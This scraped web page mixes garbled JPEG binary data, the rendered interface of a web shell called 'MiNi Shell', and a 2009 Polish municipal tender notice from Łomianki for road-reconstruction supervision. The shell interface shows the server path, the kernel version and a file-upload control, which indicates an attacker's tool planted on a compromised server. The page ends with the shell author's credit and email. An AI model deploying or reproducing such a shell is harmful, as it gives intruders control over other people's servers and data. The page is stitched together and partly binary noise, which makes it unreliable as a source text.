JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091009/353440-N-2009.html

<p class="kh_header"><b>Łomianki: Pełnienie nadzoru  inwestorskiego w trakcie realizacji inwestycji pod nazwą Kompleksowa przebudowa ul. Warszawskiej w Łomiankach  na odcinku od ul. Włościańskiej do ul. Wiślanej</b><br>
<b>Numer ogłoszenia: 353440 - 2009; data zamieszczenia: 09.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 0-22 7686302, faks 0-22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru  inwestorskiego w trakcie realizacji inwestycji pod nazwą Kompleksowa przebudowa ul. Warszawskiej w Łomiankach  na odcinku od ul. Włościańskiej do ul. Wiślanej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji inspektora nadzoru inwestorskiego dla Kompleksowej przebudowy ul. Warszawskiej w Łomiankach na odc. od ul. Włościańskiej do ul. Wiślanej - zad 38/09 w zakresie: inspektora nadzoru robót drogowych, inspektora nadzoru robót sanitarnych, inspektora nadzoru robót elektrycznych. Zakres obowiązków inspektora nadzoru wynika z art. 25 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (jednolity tekst: Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zmianami i obejmuje w szczególności: wydawanie poleceń i instrukcji wykonawcy robót budowlanych potwierdzonych wpisem do dziennika budowy celem prawidłowego i rzetelnego wykonania prac określonych w umowie z Wykonawcą robót, udział w czynnościach odbioru robót zanikowych, oraz odbioru końcowego, gwarancyjnego i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do: stwierdzenia gotowości do odbioru, przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej, podejmowanie czynności zapewniających techniczna poprawność realizowanej inwestycji, obecność na terenie realizowanej inwestycji codziennie od poniedziałku do soboty w godzinach zapewniających skuteczność nadzoru oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, umowy oraz projektu, w przypadku wystąpienia robót dodatkowych, sprawdzenie ich ilości oraz kosztorysów ofertowych na roboty dodatkowe, potwierdzanie ilości faktyczne wykonywanych robót oraz usunięcia wad, stwierdzonych w trakcie nadzoru, sprawdzanie obmiarów robót
i kosztorysów powykonawczych oraz potwierdzenie wykonywanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót, sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej, udział w czynnościach przekazania Wykonawcy terenu budowy
i udział w naradach technicznych, uzgadnianie możliwości wprowadzenia rozwiązań zamiennych w stosunku
do przewidzianych w projekcie a zgłoszonych przez Kierownika Budowy lub przez Zamawiającego, informowanie Zamawiającego na bieżąco o przebiegu realizacji robót, Przedmiot zamówienia ze względu na pozyskanie środków jest podzielony  na dwa zakresy. Zakres I: Pełnienie nadzoru inwestorskiego w branży drogowej dł. odcinka 830 mb., branży sanitarnej - kanalizacja deszczowa, branży elektrycznej - budowa oświetlenia ulicznego, branży elektrycznej - budowa sygnalizacji świetlnej - zadanie to jest  współfinansowane  z  w ramach Europejskiego Funduszu Rozwoju Regionalnego Programu operacyjnego woj. Mazowieckiego - działanie 3.1. Infrastruktura drogowa (drogi gminne). Zakres II: Pełnienie nadzoru inwestorskiego w trakcie wykonania: przebudowy gazociągu, przebudowy przewodu wodociągowego. W celu poprawnego przygotowania oferty wskazana jest wizja lokalna w terenie. W przypadku wystąpienia okoliczności skutkujących brakiem wyłonienia w postępowaniu
o udzielenie zamówienia publicznego Wykonawcy robót budowlanych, których nadzór jest przedmiotem niniejszego postępowania Zamawiający zastrzega sobie prawo do odstąpienia od umowy bez konsekwencji dla każdej ze stron. Na podstawie art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie w formie aneksu w szczególności: w przypadku wystąpienia okoliczności polegających na przesunięciu terminu realizowania zadania na roboty budowlane Zamawiający przedłuży termin wykonania przedmiotu zamówienia. Zmiana zostanie dokonana w formie aneksu i nie będzie stanowić podstawy do zmiany wynagrodzenia w przypadku wystąpienia okoliczności zmian obowiązujących przepisów prawa określających wysokość stawki podatku VAT mogą ulec zmianie stawki wynagrodzenia. przewiduje się również możliwość zmiany umowy z przyczyn innych niż wskazanych powyżej, jeżeli konieczność wprowadzenia takiej zmiany wyniknie z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ, pomimo  zachowania należytej staranności - powyższe nie będzie stanowić podstawy do zmiany wynagrodzenia. Termin płatności - 14 dni od daty złożenia prawidłowo wystawionej faktury VAT..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium 600 zł - (słownie: sześćset złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.	 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2.	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym
 i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne  zobowiązanie   innych  podmiotów  do udostępnienia  potencjału  technicznego  i osób  zdolnych do wykonania zamówienia;
3.	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,
na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.	Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, zakresu wykonywanych przez nich czynności. Zamawiający wymaga aby w celu potwierdzenia niniejszego warunku  Wykonawca przedstawił w wykazie minimum 1 osobę/ osoby posiadającą/ce aktualne uprawnienia budowlane w specjalności:  -drogowej, -  instalacyjnej w zakresie sieci, instalacji
 i urządzeń gazowych, urządzeń sanitarnych (wodociągowych i     kanalizacyjnych), -instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Kopię dokumentów potwierdzających  powyższe wraz z aktualnym zaświadczeniem o przynależności  do Okręgowej Izby Inżynierów Budownictwa  należy  dołączyć do  oferty.
4.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie  o  którym mowa w pkt. 3 Wykonawca wskazał  osoby, którymi  będzie dysponował.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, składa dokumenty zgodne z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm.). 
6.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunki określone powyżej.
7.	W przypadku Wykonawców występujących wspólnie należy załączyć do oferty pełnomocnictwo
do reprezentowania ich w postępowaniu o zamówienie publiczne albo do reprezentowania
w postępowaniu  i zawarcia umowy o zamówienie publiczne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lomianki.pl  (BIP).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek: w  siedzibie Zamawiającego, pon. w godz. 10:00-18:00, wt.-pt. w godz. 8:00 16:00, lub drogą pocztową - cena 20,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2009 godzina 12:00, miejsce: Urząd Miejski w Łomiankach ul. Warszawska 115 , 05-092 Łomianki,
pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com